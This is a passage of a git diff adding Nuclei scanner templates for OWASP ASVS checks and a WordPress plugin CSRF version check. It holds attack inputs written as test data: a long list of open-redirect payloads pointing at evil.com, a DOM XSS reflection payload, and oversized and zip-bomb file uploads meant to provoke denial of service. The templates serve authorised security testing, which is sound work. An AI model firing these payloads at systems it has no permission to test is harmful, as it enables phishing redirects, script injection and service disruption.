filename="zipbomb.zip" + Content-Type: application/zip + + {{code_response}} + ------WebKitFormBoundaryiugABg7zoMAxIKId-- + + matchers: + - type: status + name: status_code + status: + - 500 + - 503 +# digest: 490a0046304402203b8787953e9fa8a0e551fc309787addc534c07c2b32f3665f6b307fb8e4cc28802206af2bc67ad42c54ee002eb47b45765e2417ac7bc1ee88414ac0c5c8352bacec1:99354b7c2d97285abe7401b783fba350 \ No newline at end of file diff --git a/poc/other/12.1.1.yaml b/poc/other/12.1.1.yaml new file mode 100644 index 0000000000..60d8604f70 --- /dev/null +++ b/poc/other/12.1.1.yaml @@ -0,0 +1,64 @@ +id: ASVS-4-0-3-V12-1-1 + +info: + name: ASVS 12.1.1 Check + author: Hamed Salimian + severity: medium + classification: + cwe-id: CWE-400 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods + - https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html + - https://snbig.github.io/Vulnerable-Pages/ASVS_12_1_1/index.html + tags: asvs,12.1.1 + description: | + Verify that the application will not accept large files that could fill up storage or cause a denial of service. + + +variables: + large_file_size: 10000000 + small_file_size: 100 + file_type: "text/plain" + file_ext: "txt" + +http: + - raw: + - | + POST {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiugABg7zoMAxIKId + + ------WebKitFormBoundaryiugABg7zoMAxIKId + Content-Disposition: form-data; name="file"; filename="{{randstr}}.{{file_ext}}" + Content-Type: {{file_type}} + + {{rand_text_alpha({{small_file_size}})}} + ------WebKitFormBoundaryiugABg7zoMAxIKId-- + + - | + POST {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiugABg7zoMAxIKId + + ------WebKitFormBoundaryiugABg7zoMAxIKId + Content-Disposition: form-data; name="file"; filename="{{randstr}}.{{file_ext}}" + Content-Type: {{file_type}} + + {{rand_text_alpha({{large_file_size}})}} + ------WebKitFormBoundaryiugABg7zoMAxIKId-- + + extractors: + - type: dsl + name: status code of large file upload. + dsl: + - status_code_2 + + matchers: + - type: dsl + name: status_code + condition: and + dsl: + - status_code_2 < 210 && status_code_2 >= 200 + - status_code_2 == status_code \ No newline at end of file diff --git a/poc/other/3867691789.yaml b/poc/other/3867691789.yaml index 89f5dcf21d..da66e29926 100644 --- a/poc/other/3867691789.yaml +++ b/poc/other/3867691789.yaml @@ -1,19 +1,57 @@ id: honeypot + info: - name: honeypot - author: cn-kali-team - tags: detect,tech,honeypot - severity: info + name: "WP Armour Honeypot Anti Spam <= 1.5.6 -Cross-Site Request Forgery to Arbitrary Options Update" + author: topscoder + severity: critical + description: "The Armour Honeypot Anti Spam plugin for WordPress is vulnerable to Cross-Site Request Forgery due to missing nonce validation on the wpa_save_settings() function in versions up to, and including, 1.5.6. This makes it possible for attackers to modify arbitrary site options granted they can trick an administrator into performing an action such as clicking on a link." + reference: + - https://wordpress.org/plugins/honeypot/#developers + - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2462797%40honeypot&new=2462797%40honeypot&sfp_email=&sfph_mail= + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H + cvss-score: 9.6 + cve-id: metadata: - product: honeypot - vendor: 00_unknown - verified: false + fofa-query: "wp-content/plugins/honeypot/" + google-query: inurl:"/wp-content/plugins/honeypot/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,honeypot,critical + http: -- method: GET - path: - - '{{BaseURL}}/' - matchers: - - type: word - words: - -

blog comments

- case-insensitive: true + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/honeypot/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "honeypot" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 1.5.7') \ No newline at end of file diff --git a/poc/other/5.1.5.yaml b/poc/other/5.1.5.yaml new file mode 100644 index 0000000000..6c073bd438 --- /dev/null +++ b/poc/other/5.1.5.yaml @@ -0,0 +1,141 @@ +id: ASVS-4-0-3-V5-1-5 + +info: + name: ASVS 5.1.5 Check + author: AmirHossein Raeisi + severity: low + classification: + cwe-id: CWE-601 + reference: + - https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html + - https://cwe.mitre.org/data/definitions/601.html + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/11-Client_Side_Testing/04-Testing_for_Client_Side_URL_Redirect + - https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/generic/open-redirect-generic.yaml + - https://snbig.github.io/Vulnerable-Pages/ASVS_5_1_5/ + tags: asvs,5.1.5 + description: | + Verify that URL redirects and forwards only allow destinations which appear on an allow list, or show a warning when redirecting to potentially untrusted content. + +variables: + vulnerable_parameter: "url" + +http: + - method: GET + path: + - "{{BaseURL}}/{{payload}}" + - "{{BaseURL}}//{{payload}}" + - "{{BaseURL}}/?{{vulnerable_parameter}}={{payload}}" + - "{{BaseURL}}?{{vulnerable_parameter}}={{payload}}" + + payloads: + payload: + - '%0a/evil.com/' + - '%0d/evil.com/' + - '%00/evil.com/' + - '%09/evil.com/' + - '%5C%5Cevil.com/%252e%252e%252f' + - '%5Cevil.com' + - '%5cevil.com/%2f%2e%2e' + - '%5c{{RootURL}}evil.com/%2f%2e%2e' + - '../evil.com' + - '.evil.com' + - '/%5cevil.com' + - '////\;@evil.com' + - '////evil.com' + - '///evil.com' + - '///evil.com/%2f%2e%2e' + - '///evil.com@//' + - '///{{RootURL}}evil.com/%2f%2e%2e' + - '//;@evil.com' + - '//\/evil.com/' + - '//\@evil.com' + - '//\evil.com' + - '//\tevil.com/' + - '//evil.com/%2F..' + - '//evil.com//' + - '//%69%6e%74%65%72%61%63%74%2e%73%68' + - '//evil.com@//' + - '//evil.com\tevil.com/' + - '//https://evil.com@//' + - '/<>//evil.com' + - '/\/\/evil.com/' + - '/\/evil.com' + - '/\evil.com' + - '/evil.com' + - '/evil.com/%2F..' + - '/evil.com/' + - '/evil.com/..;/css' + - '/https:evil.com' + - '/{{RootURL}}evil.com/' + - '/〱evil.com' + - '/〵evil.com' + - '/ゝevil.com' + - '/ーevil.com' + - '/ーevil.com' + - '<>//evil.com' + - '@evil.com' + - '@https://evil.com' + - '\/\/evil.com/' + - 'evil%E3%80%82com' + - 'evil.com' + - 'evil.com/' + - 'evil.com//' + - 'evil.com;@' + - 'https%3a%2f%2fevil.com%2f' + - 'https:%0a%0devil.com' + - 'https://%0a%0devil.com' + - 'https://%09/evil.com' + - 'https://%2f%2f.evil.com/' + - 'https://%3F.evil.com/' + - 'https://%5c%5c.evil.com/' + - 'https://%5cevil.com@' + - 'https://%23.evil.com/' + - 'https://.evil.com' + - 'https://////evil.com' + - 'https:///evil.com' + - 'https:///evil.com/%2e%2e' + - 'https:///evil.com/%2f%2e%2e' + - 'https:///evil.com@evil.com/%2e%2e' + - 'https:///evil.com@evil.com/%2f%2e%2e' + - 'https://:80#@evil.com/' + - 'https://:80?@evil.com/' + - 'https://:@\@evil.com' + - 'https://:@evil.com\@evil.com' + - 'https://;@evil.com' + - 'https://\tevil.com/' + - 'https://evil.com/evil.com' + - 'https://evil.com/https://evil.com/' + - 'https://www.\.evil.com' + - 'https:/\/\evil.com' + - 'https:/\evil.com' + - 'https:/evil.com' + - 'https:evil.com' + - '{{RootURL}}evil.com' + - '〱evil.com' + - '〵evil.com' + - 'ゝevil.com' + - 'ーevil.com' + - 'ーevil.com' + - 'redirect/evil.com' + - 'cgi-bin/redirect.cgi?evil.com' + - 'out?evil.com' + - 'login?to=http://evil.com' + - '1/_https@evil.com' + - 'redirect?targeturl=https://evil.com' + + redirects: false + matchers-condition: and + stop-at-first-match: true + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/idfD2e/1 + - type: status + status: + - 301 + - 302 + - 303 + - 304 + - 307 + - 308 diff --git a/poc/other/5.3.3.1.yaml b/poc/other/5.3.3.1.yaml new file mode 100644 index 0000000000..f3fb1a58f5 --- /dev/null +++ b/poc/other/5.3.3.1.yaml @@ -0,0 +1,54 @@ +id: ASVS-4-0-3-V5-3-3-1 + +info: + name: ASVS 5.3.3.1 (Dom-based XSS) Check + author: AmirHossein Raeisi + severity: medium + classification: + cwe-id: CWE-79 + reference: + - https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_DOM-based_Cross_Site_Scripting + - https://snbig.github.io/Vulnerable-Pages/ASVS_5_3_3/ + - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/xss/dom-xss.yaml + tags: asvs,5.3.3 + description: | + Verify that context-aware, preferably automated - or at worst, manual - output escaping protects against reflected, stored, and DOM based XSS. ([C4](https://owasp.org/www-project-proactive-controls/#div-numbering)) + +variables: + num: "{{rand_int(10000, 99999)}}" +headless: + - steps: + - action: navigate + args: + url: "{{BaseURL}}" + + - action: waitload + payloads: + reflection: + - "'\">

{{num}}

" + + fuzzing: + - part: query + type: postfix + mode: single + fuzz: + - "{{reflection}}" + + - part: path + type: postfix + mode: single + fuzz: + - "{{reflection}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "

{{num}}

" + + - type: word + part: header + words: + - "text/html" \ No newline at end of file diff --git a/poc/other/8.2.1.yaml b/poc/other/8.2.1.yaml new file mode 100644 index 0000000000..83002bb26f --- /dev/null +++ b/poc/other/8.2.1.yaml @@ -0,0 +1,28 @@ +id: ASVS-4-0-3-V8-2-1 + +info: + name: ASVS 8.2.1 Check + author: AmirHossein Raeisi + severity: info + classification: + cwe-id: CWE-525 + reference: + - https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/04-Authentication_Testing/06-Testing_for_Browser_Cache_Weaknesses + - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Cache-Control + tags: asvs,8.2.1 + description: | + Verify the application sets sufficient anti-caching headers so that sensitive data is not cached in modern browsers. + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + stop-at-first-match: true + matchers: + - type: regex + part: header + regex: + - '(?i)cache-control:.*no-store' + negative: true diff --git a/poc/other/9.1.2.yaml b/poc/other/9.1.2.yaml new file mode 100644 index 0000000000..5170641f4f --- /dev/null +++ b/poc/other/9.1.2.yaml @@ -0,0 +1,425 @@ +id: ASVS-4-0-3-V9-1-2 + +info: + name: ASVS 9.1.2 Check + author: AmirHossein Raeisi + severity: Low + classification: + cwe-id: CWE-918 + reference: + - https://www.acunetix.com/vulnerabilities/web/tls-ssl-weak-cipher-suites/ + - https://github.com/projectdiscovery/nuclei-templates/blob/main/ssl/insecure-cipher-suite-detect.yaml + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/01-Testing_for_Weak_Transport_Layer_Security + - https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Security_Cheat_Sheet.html + tags: asvs,9.1.2 + description: | + Verify using up to date TLS testing tools that only strong cipher suites are enabled, with the strongest cipher suites set as preferred. + +ssl: + - address: "{{Host}}:{{Port}}" + min_version: tls10 + max_version: tls10 + + extractors: + - type: dsl + dsl: + - "tls_version, cipher" + matchers: + - type: word + part: cipher + words: + - "TLS_DHE_PSK_WITH_NULL_SHA384" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA" + - "TLS_DH_anon_WITH_AES_128_GCM_SHA256" + - "TLS_NULL_WITH_NULL_NULL" + - "TLS_DH_DSS_WITH_DES_CBC_SHA" + - "TLS_ECDH_RSA_WITH_NULL_SHA" + - "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_128_CBC_SHA256" + - "TLS_RSA_WITH_RC4_128_MD5" + - "TLS_SM4_CCM_SM3" + - "TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384" + - "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_ECDH_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5" + - "TLS_RSA_PSK_WITH_RC4_128_SHA" + - "TLS_GOSTR341112_256_WITH_MAGMA_CTR_OMAC" + - "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_256_GCM_SHA384" + - "TLS_DHE_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_RC4_128_SHA" + - "TLS_PSK_WITH_RC4_128_SHA" + - "TLS_DHE_PSK_WITH_RC4_128_SHA" + - "TLS_KRB5_WITH_DES_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256" + - "TLS_PSK_WITH_NULL_SHA" + - "TLS_RSA_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_RC4_128_MD5" + - "TLS_ECDHE_ECDSA_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256" + - "TLS_RSA_WITH_NULL_MD5" + - "TLS_SHA384_SHA384" + - "TLS_SHA256_SHA256" + - "TLS_DH_anon_WITH_AES_256_GCM_SHA384" + - "TLS_RSA_WITH_NULL_SHA256" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA" + - "TLS_RSA_WITH_DES_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA" + - "TLS_PSK_WITH_NULL_SHA384" + - "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_RC4_128_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA" + - "TLS_DHE_PSK_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_ARIA_256_CBC_SHA384" + - "TLS_DH_anon_WITH_DES_CBC_SHA" + - "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_SEED_CBC_SHA" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA256" + - "TLS_DHE_DSS_WITH_DES_CBC_SHA" + - "TLS_PSK_WITH_NULL_SHA256" + - "TLS_ECDH_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_AES_128_CBC_SHA" + - "TLS_ECDHE_PSK_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_AES_256_CBC_SHA" + - "TLS_KRB5_WITH_IDEA_CBC_MD5" + - "TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC" + - "TLS_ECDHE_RSA_WITH_NULL_SHA" + - "TLS_GOSTR341112_256_WITH_28147_CNT_IMIT" + - "TLS_RSA_PSK_WITH_NULL_SHA" + - "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_DES_CBC_MD5" + - "TLS_KRB5_EXPORT_WITH_RC4_40_SHA" + - "TLS_DH_anon_WITH_ARIA_128_GCM_SHA256" + - "TLS_SM4_GCM_SM3" + - "TLS_ECDHE_PSK_WITH_NULL_SHA384" + - "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_NULL_SHA256" + - "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_RSA_WITH_DES_CBC_SHA" + - "TLS_ECDHE_RSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_RC4_128_SHA" + - "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DHE_RSA_WITH_DES_CBC_SHA" + - "TLS_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA256" + - "TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256" + - "TLS_ECDH_ECDSA_WITH_NULL_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA384" + - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" + - "TLS_KRB5_WITH_RC4_128_SHA" + - "TLS_RSA_WITH_NULL_SHA" + condition: or + + - address: "{{Host}}:{{Port}}" + min_version: tls11 + max_version: tls11 + + extractors: + - type: dsl + dsl: + - "tls_version, cipher" + matchers: + - type: word + part: cipher + words: + - "TLS_DHE_PSK_WITH_NULL_SHA384" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA" + - "TLS_DH_anon_WITH_AES_128_GCM_SHA256" + - "TLS_NULL_WITH_NULL_NULL" + - "TLS_DH_DSS_WITH_DES_CBC_SHA" + - "TLS_ECDH_RSA_WITH_NULL_SHA" + - "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_128_CBC_SHA256" + - "TLS_RSA_WITH_RC4_128_MD5" + - "TLS_SM4_CCM_SM3" + - "TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384" + - "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_ECDH_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5" + - "TLS_RSA_PSK_WITH_RC4_128_SHA" + - "TLS_GOSTR341112_256_WITH_MAGMA_CTR_OMAC" + - "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_256_GCM_SHA384" + - "TLS_DHE_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_RC4_128_SHA" + - "TLS_PSK_WITH_RC4_128_SHA" + - "TLS_DHE_PSK_WITH_RC4_128_SHA" + - "TLS_KRB5_WITH_DES_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256" + - "TLS_PSK_WITH_NULL_SHA" + - "TLS_RSA_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_RC4_128_MD5" + - "TLS_ECDHE_ECDSA_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256" + - "TLS_RSA_WITH_NULL_MD5" + - "TLS_SHA384_SHA384" + - "TLS_SHA256_SHA256" + - "TLS_DH_anon_WITH_AES_256_GCM_SHA384" + - "TLS_RSA_WITH_NULL_SHA256" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA" + - "TLS_RSA_WITH_DES_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA" + - "TLS_PSK_WITH_NULL_SHA384" + - "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_RC4_128_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA" + - "TLS_DHE_PSK_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_ARIA_256_CBC_SHA384" + - "TLS_DH_anon_WITH_DES_CBC_SHA" + - "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_SEED_CBC_SHA" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA256" + - "TLS_DHE_DSS_WITH_DES_CBC_SHA" + - "TLS_PSK_WITH_NULL_SHA256" + - "TLS_ECDH_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_AES_128_CBC_SHA" + - "TLS_ECDHE_PSK_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_AES_256_CBC_SHA" + - "TLS_KRB5_WITH_IDEA_CBC_MD5" + - "TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC" + - "TLS_ECDHE_RSA_WITH_NULL_SHA" + - "TLS_GOSTR341112_256_WITH_28147_CNT_IMIT" + - "TLS_RSA_PSK_WITH_NULL_SHA" + - "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_DES_CBC_MD5" + - "TLS_KRB5_EXPORT_WITH_RC4_40_SHA" + - "TLS_DH_anon_WITH_ARIA_128_GCM_SHA256" + - "TLS_SM4_GCM_SM3" + - "TLS_ECDHE_PSK_WITH_NULL_SHA384" + - "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_NULL_SHA256" + - "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_RSA_WITH_DES_CBC_SHA" + - "TLS_ECDHE_RSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_RC4_128_SHA" + - "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DHE_RSA_WITH_DES_CBC_SHA" + - "TLS_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA256" + - "TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256" + - "TLS_ECDH_ECDSA_WITH_NULL_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA384" + - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" + - "TLS_KRB5_WITH_RC4_128_SHA" + - "TLS_RSA_WITH_NULL_SHA" + condition: or + + - address: "{{Host}}:{{Port}}" + min_version: tls12 + max_version: tls12 + + extractors: + - type: dsl + dsl: + - "tls_version, cipher" + matchers: + - type: word + part: cipher + words: + - "TLS_DHE_PSK_WITH_NULL_SHA384" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA" + - "TLS_DH_anon_WITH_AES_128_GCM_SHA256" + - "TLS_NULL_WITH_NULL_NULL" + - "TLS_DH_DSS_WITH_DES_CBC_SHA" + - "TLS_ECDH_RSA_WITH_NULL_SHA" + - "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_128_CBC_SHA256" + - "TLS_RSA_WITH_RC4_128_MD5" + - "TLS_SM4_CCM_SM3" + - "TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384" + - "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_ECDH_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5" + - "TLS_RSA_PSK_WITH_RC4_128_SHA" + - "TLS_GOSTR341112_256_WITH_MAGMA_CTR_OMAC" + - "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_256_GCM_SHA384" + - "TLS_DHE_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_RC4_128_SHA" + - "TLS_PSK_WITH_RC4_128_SHA" + - "TLS_DHE_PSK_WITH_RC4_128_SHA" + - "TLS_KRB5_WITH_DES_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256" + - "TLS_PSK_WITH_NULL_SHA" + - "TLS_RSA_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_RC4_128_MD5" + - "TLS_ECDHE_ECDSA_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256" + - "TLS_RSA_WITH_NULL_MD5" + - "TLS_SHA384_SHA384" + - "TLS_SHA256_SHA256" + - "TLS_DH_anon_WITH_AES_256_GCM_SHA384" + - "TLS_RSA_WITH_NULL_SHA256" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA" + - "TLS_RSA_WITH_DES_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA" + - "TLS_PSK_WITH_NULL_SHA384" + - "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_RC4_128_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA" + - "TLS_DHE_PSK_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_ARIA_256_CBC_SHA384" + - "TLS_DH_anon_WITH_DES_CBC_SHA" + - "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_SEED_CBC_SHA" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA256" + - "TLS_DHE_DSS_WITH_DES_CBC_SHA" + - "TLS_PSK_WITH_NULL_SHA256" + - "TLS_ECDH_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_AES_128_CBC_SHA" + - "TLS_ECDHE_PSK_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_AES_256_CBC_SHA" + - "TLS_KRB5_WITH_IDEA_CBC_MD5" + - "TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC" + - "TLS_ECDHE_RSA_WITH_NULL_SHA" + - "TLS_GOSTR341112_256_WITH_28147_CNT_IMIT" + - "TLS_RSA_PSK_WITH_NULL_SHA" + - "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_DES_CBC_MD5" + - "TLS_KRB5_EXPORT_WITH_RC4_40_SHA" + - "TLS_DH_anon_WITH_ARIA_128_GCM_SHA256" + - "TLS_SM4_GCM_SM3" + - "TLS_ECDHE_PSK_WITH_NULL_SHA384" + - "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_NULL_SHA256" + - "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_RSA_WITH_DES_CBC_SHA" + - "TLS_ECDHE_RSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_RC4_128_SHA" + - "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DHE_RSA_WITH_DES_CBC_SHA" + - "TLS_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA256" + - "TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256" + - "TLS_ECDH_ECDSA_WITH_NULL_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA384" + - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" + - "TLS_KRB5_WITH_RC4_128_SHA" + - "TLS_RSA_WITH_NULL_SHA" + condition: or + + - address: "{{Host}}:{{Port}}" + min_version: tls13 + max_version: tls13 + + extractors: + - type: dsl + dsl: + - "tls_version, cipher" + matchers: + - type: word + part: cipher + words: + - "TLS_DHE_PSK_WITH_NULL_SHA384" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA" + - "TLS_DH_anon_WITH_AES_128_GCM_SHA256" + - "TLS_NULL_WITH_NULL_NULL" + - "TLS_DH_DSS_WITH_DES_CBC_SHA" + - "TLS_ECDH_RSA_WITH_NULL_SHA" + - "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_128_CBC_SHA256" + - "TLS_RSA_WITH_RC4_128_MD5" + - "TLS_SM4_CCM_SM3" + - "TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384" + - "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_ECDH_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5" + - "TLS_RSA_PSK_WITH_RC4_128_SHA" + - "TLS_GOSTR341112_256_WITH_MAGMA_CTR_OMAC" + - "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_256_GCM_SHA384" + - "TLS_DHE_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_RC4_128_SHA" + - "TLS_PSK_WITH_RC4_128_SHA" + - "TLS_DHE_PSK_WITH_RC4_128_SHA" + - "TLS_KRB5_WITH_DES_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA" + - 